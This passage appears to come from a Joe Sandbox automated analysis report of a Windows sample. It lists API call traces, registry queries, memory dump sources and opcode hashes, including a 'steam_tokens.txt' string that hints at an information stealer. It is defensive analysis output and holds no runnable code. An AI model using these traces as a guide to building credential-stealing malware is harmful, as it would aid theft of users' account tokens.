                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 752a965ea3372a915528874ab8fe5a2a603028d5a721152eb3fa21e92c4a9375
                        • Instruction ID: c72fd5c837a4b80dbbf6a6767d82475c7caaecf29f669b53a05c64aa821e1d83
                        • Opcode Fuzzy Hash: 752a965ea3372a915528874ab8fe5a2a603028d5a721152eb3fa21e92c4a9375
                        • Instruction Fuzzy Hash: BC415571B10119AFCB55EB68DD46FED7778FF88300F1044A8BA1A972D1DE709E888B91
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091ECDF
                        • lstrlen.KERNEL32(00000000), ref: 0091ECF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ED1D
                        • lstrlen.KERNEL32(00000000), ref: 0091ED24
                        • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0091ED52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: steam_tokens.txt
                        • API String ID: 367037083-401951677
                        • Opcode ID: dbe36c5ca1e973f48026310293466455e4c652b460cc77af0cd0de1e65fe9f40
                        • Instruction ID: c2380a7d69e2f8b64cd0b83930070dc11a85a91d8e30f672989895c4f932e513
                        • Opcode Fuzzy Hash: dbe36c5ca1e973f48026310293466455e4c652b460cc77af0cd0de1e65fe9f40
                        • Instruction Fuzzy Hash: DA315E31B105195FC722BB78FE4EAAE7BA8AF90300F154120B846DB2D2DF24DD498BD1
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0090140E), ref: 00909A9A
                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0090140E), ref: 00909AB0
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,0090140E), ref: 00909AC7
                        • ReadFile.KERNEL32(00000000,00000000,?,0090140E,00000000,?,?,?,0090140E), ref: 00909AE0
                        • LocalFree.KERNEL32(?,?,?,?,0090140E), ref: 00909B00
                        • CloseHandle.KERNEL32(00000000,?,?,?,0090140E), ref: 00909B07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: e718dd46d65ad7c65c190c5a278cd57302684cf44204aabbb8bcacaf5dc3db3e
                        • Instruction ID: 48431d6948f370e2cc4b0e77e83f559c2a1edcb7e051f6ef8178a84e13df7c2b
                        • Opcode Fuzzy Hash: e718dd46d65ad7c65c190c5a278cd57302684cf44204aabbb8bcacaf5dc3db3e
                        • Instruction Fuzzy Hash: 18115B71600209AFEB10DFA9DDC8AAE736CEB44350F200659F905A72C1EB709D10CBA1
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925B14
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00925B7C
                        • memmove.MSVCRT(00000000,?,?), ref: 00925B89
                        • memmove.MSVCRT(00000000,?,?), ref: 00925B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long
                        • API String ID: 2052693487-3788999226
                        • Opcode ID: c0adcfc1cedbc78e0c7b06b1463aae718d184ad3617d5cba4dd94f9f63c5efbb
                        • Instruction ID: 574472fd31a7d39140ea80a2620bcb0893e880223c8ba5e99dd5f357098d87f5
                        • Opcode Fuzzy Hash: c0adcfc1cedbc78e0c7b06b1463aae718d184ad3617d5cba4dd94f9f63c5efbb
                        • Instruction Fuzzy Hash: 6D417371B005199FCF08DF6CD995A6EB7F5EB88310F158229E905E7348E630DD00CB90
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917D58
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1D5
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917D76
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$std::exception::exception
                        • String ID: invalid string position$string too long
                        • API String ID: 3310641104-4289949731
                        • Opcode ID: 760e81ce48885b3eeda942b9fe641c160e10ae29395e8994d0cc30e12db8f5ec
                        • Instruction ID: f85412d36cf82c89998fa65cc223b8cc8f33d26d7eb04f126b555fddb5918fd2
                        • Opcode Fuzzy Hash: 760e81ce48885b3eeda942b9fe641c160e10ae29395e8994d0cc30e12db8f5ec
                        • Instruction Fuzzy Hash: 8821B93230420A5BD720DEACE881A7AF7F9AFD1750F214A6EE452CB291D771DC808765
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009233EF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009233F6
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00923411
                        • wsprintfA.USER32 ref: 00923437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB
                        • API String ID: 2922868504-2651807785
                        • Opcode ID: 8419f6d6551efb266e39170d69aa23b18a44b8fbbe75ece2b0256c95b1414b30
                        • Instruction ID: d7912231fdb083818bc554a5712330d31faff031a8c60f62a490867e972ba80c
                        • Opcode Fuzzy Hash: 8419f6d6551efb266e39170d69aa23b18a44b8fbbe75ece2b0256c95b1414b30
                        • Instruction Fuzzy Hash: A201D871A04614AFDB04DF98DD45B6EB7BCFB44710F104629F906E7380DBB8590087A5
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,015EF0D0,00000000,00020119,?), ref: 0091D7F5
                        • RegQueryValueExA.ADVAPI32(?,015EFFA0,00000000,00000000,00000000,000000FF), ref: 0091D819
                        • RegCloseKey.ADVAPI32(?), ref: 0091D823
                        • lstrcat.KERNEL32(?,00000000), ref: 0091D848
                        • lstrcat.KERNEL32(?,015F0078), ref: 0091D85C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 20931d879f18c38a0c6d6164d3af7ec0fa318a2ded5d1456960c1f5d85f6fadd
                        • Instruction ID: ef7792a481e839481d4405570adec64c987542f49ebe2f57fc2f3dc16f10656c
                        • Opcode Fuzzy Hash: 20931d879f18c38a0c6d6164d3af7ec0fa318a2ded5d1456960c1f5d85f6fadd
                        • Instruction Fuzzy Hash: 9B413275A1020CAFCB54EF68EC86BDE7779AF94304F504064B50997291EE30AA89CF91
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00917F31
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00917F60
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00917FA5
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00917FD3
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00918007
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: daef36af42dc261e5f8e620f4e1d3edcc82d35db4b0f5e1ad8d8acd285abfc9a
                        • Instruction ID: 93eb975ecd7a82eebe3fff5c9719d1485110d925d629c91e8d36c8a3bd526024
                        • Opcode Fuzzy Hash: daef36af42dc261e5f8e620f4e1d3edcc82d35db4b0f5e1ad8d8acd285abfc9a
                        • Instruction Fuzzy Hash: 82416D7060411ADFCB20DFA8D884EEEB7B8FF54300F114599E8069B351DB74AAA6CF91
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 009180BB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009180EA
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00918102
                        • lstrlen.KERNEL32(00000000), ref: 00918140
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091816F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: d3564b001703de159deca82c01a5c6c19269662debda69a4a030bd14d982ad7b
                        • Instruction ID: 078624a06090e1af2c1ae27170fa9bdd6beb1234dee004e02f9558202cc01850
                        • Opcode Fuzzy Hash: d3564b001703de159deca82c01a5c6c19269662debda69a4a030bd14d982ad7b
                        • Instruction Fuzzy Hash: 6D415C7260020AABDB21DF6CD988BEBBBF8EF44700F11851DA849D7244EE34D985DB90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00923166
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092316D
                        • RegOpenKeyExA.ADVAPI32(80000002,015DB8D8,00000000,00020119,?), ref: 0092318C
                        • RegQueryValueExA.ADVAPI32(?,015EED90,00000000,00000000,00000000,000000FF), ref: 009231A7
                        • RegCloseKey.ADVAPI32(?), ref: 009231B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 88f8f0d2d691ae85eb2fcc31fa378551aa81e82cece56760321a67ee98296dd3
                        • Instruction ID: 1d5dbd96ddecc0a34e8076c9c940c3b1a532a2b4ca653fbdab9d6e9285ef4a6f
                        • Opcode Fuzzy Hash: 88f8f0d2d691ae85eb2fcc31fa378551aa81e82cece56760321a67ee98296dd3
                        • Instruction Fuzzy Hash: 6B118272A04319AFD714CB94EC45FAFB7BCF744711F104219FA05D3280DB7459048BA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 4b19f08e9ebd8beb68d05a84b423413fe48c82c07629c3135e5bbe63e595e1d1
                        • Instruction ID: 821fa64696fb0763afb129c2601ac4e094f1f0481232c3da7f889846c1e7ee61
                        • Opcode Fuzzy Hash: 4b19f08e9ebd8beb68d05a84b423413fe48c82c07629c3135e5bbe63e595e1d1
                        • Instruction Fuzzy Hash: FF41297050476C9EDB318B25AC85FFBBBFC9B45304F1444E8E99686187E2719A448F20
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00908996
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1D5
